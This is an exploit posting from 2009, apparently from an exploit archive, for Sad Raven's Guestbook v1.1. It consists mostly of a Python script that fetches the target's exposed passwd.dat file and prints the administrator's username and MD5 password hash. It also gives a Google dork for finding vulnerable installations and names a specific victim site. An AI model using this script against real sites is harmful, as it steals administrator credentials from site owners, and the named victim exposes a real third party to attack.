sadravengb-disclose.txt
Posted on 23 January 2009
#!/usr/bin/python #Portal Name: Sad Raven's Guestbook #version: 1.1 #Google Dork: sad Raven's Guestbook #Exploit Coded by: Pouya_Server #Exploit Discovered by: Pouya_Server #Contact Me: Pouya.s3rver@Gmail.com import urllib import sys import parser serv="http://" i=0 for arg in sys.argv: i=i+1 if i!=3: print """ Sad Raven's Guestbook v1.1 (passwd.dat) Usage:exploit.py [targetsite] [path] Example:exploit.py www.target.com /Path/ Result=$Password['Admin']="c71032e32b9ce349f99f655e68d7324g" $Password['Admin Username']="Admin Password [MD5]" """ else: adres=sys.argv[1] path=sys.argv[2] str1=adres.join([serv,path]) str2=str1.join(['','/passwd.dat']) print " [~]Connecting..." url=urllib.urlopen(str2).read(); print " [+]Connected!" test=url.find(path); t=0; print " -=[Admin Username and Password]=-" while(url[test+1]!=1): # Pouya_Server print url[test], if(url[test]==' '): t=t+1; if(t==2): break; test=test+1; print " [ Coded by Pouya_Server ]" -------------------------------------------------- Victem : http://djnixon.ru/guest/